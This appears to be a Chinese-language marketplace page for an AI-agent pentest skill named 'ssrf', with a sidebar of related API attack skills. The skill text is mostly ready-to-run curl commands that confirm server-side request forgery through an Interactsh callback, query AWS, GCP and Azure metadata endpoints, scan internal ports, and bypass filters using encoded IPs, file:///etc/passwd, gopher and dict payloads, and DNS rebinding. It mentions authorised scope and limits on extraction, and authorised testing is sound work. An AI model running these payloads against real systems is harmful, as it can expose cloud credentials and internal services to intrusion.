在 Manus 中运行任何 Skill
一键导入
一键导入
一键在 Manus 中运行任何 Skill
开始使用ssrf
星标2
分支0
更新时间2026年6月3日 04:04
检测和利用服务端请求伪造(SSRF)漏洞,包括云元数据访问、内网探测和过滤器绕过。
安装
用 Codex 或 Claude 帮你安装 复制这段 Prompt,粘贴到 Codex、Claude 或其他助手里,让它检查 Skill 页面并帮你完成安装。
SKILL.md
readonly菜单
检测和利用服务端请求伪造(SSRF)漏洞,包括云元数据访问、内网探测和过滤器绕过。
用 Codex 或 Claude 帮你安装 复制这段 Prompt,粘贴到 Codex、Claude 或其他助手里,让它检查 Skill 页面并帮你完成安装。
基于 SOC 职业分类
通过被动来源和受控主动 DNS 枚举目标子域名,发现更多授权攻击面入口。
使用 agent-browser 在授权范围内执行浏览器交互验证,并在需要视觉判断时调用 pents vision-review 生成结构化视觉复核结果。
检测 API 中的功能级授权破坏(BFLA),验证普通用户是否能通过直接调用管理端点或操纵 HTTP 方法来执行管理员功能。
检测 API 中的对象级授权缺陷(BOLA/IDOR),通过篡改对象标识符越权访问或修改其他用户的数据。
利用 JWT 库接受 alg:none 的漏洞绕过签名验证,伪造任意 Token 实现权限提升。
检测 API 中的批量赋值漏洞,通过在请求体中添加非预期字段修改不应被客户端控制的属性。
| name | ssrf |
| description | 检测和利用服务端请求伪造(SSRF)漏洞,包括云元数据访问、内网探测和过滤器绕过。 |
| category | web |
| source | xalgorix |
| tags | ["SSRF","云安全","内网探测","协议滥用"] |
| required_tools | ["curl","Burp Collaborator 或 Interactsh"] |
# 常见 SSRF 入口点
# - 网页截图/预览服务:url=, preview=, thumbnail=
# - Webhook 配置:callback=, webhook_url=, notify_url=
# - 文件导入:import_url=, fetch=, load=
# - 图片代理:src=, image_url=, proxy=
# - PDF 生成器:html=, template_url=
# 使用 Interactsh 获取回连地址
INTERACT=$(interactsh-client -v 2>&1 | grep -oP '[a-z0-9]+\.[a-z0-9]+\.[a-z0-9]+\.[a-z0-9]+' | head -1)
# 测试目标是否发起外部请求
curl -X POST "https://<target>/fetch" \
-d "url=http://$INTERACT/test"
如 Interactsh 收到回连,确认 SSRF 存在。
# AWS IMDSv1(最常见)
curl -X POST "https://<target>/fetch" \
-d "url=http://169.254.169.254/latest/meta-data/"
# GCP
curl -X POST "https://<target>/fetch" \
-d "url=http://metadata.google.internal/computeMetadata/v1/"
# Azure
curl -X POST "https://<target>/fetch" \
-d "url=http://169.254.169.254/metadata/instance?api-version=2021-02-01" \
-H "Metadata: true"
仅验证可访问性,不逐级提取完整元数据,除非主代理确认允许。
# 仅扫描常见端口
for port in 80 443 8080 8443 3306 6379 27017; do
curl -X POST "https://<target>/fetch" \
-d "url=http://127.0.0.1:$port/" \
-w "\n$port: %{http_code}\n" -o /dev/null -s
done
# IP 编码绕过
# 127.0.0.1 的变体:
# 十进制: http://2130706433/
# 八进制: http://0177.0.0.1/
# 十六进制: http://0x7f.0x0.0x0.0x1/
# IPv6: http://[::1]/
# URL 包装: http://localtest.me/ → 127.0.0.1
# 协议绕过
# file:///etc/passwd
# gopher://127.0.0.1:25/_HELO%20localhost
# dict://127.0.0.1:6379/info
如果目标有 URL 白名单,测试 DNS 重绑定:
# 使用 nip.io 或 xip.io 服务
curl -X POST "https://<target>/fetch" \
-d "url=http://127.0.0.1.nip.io/"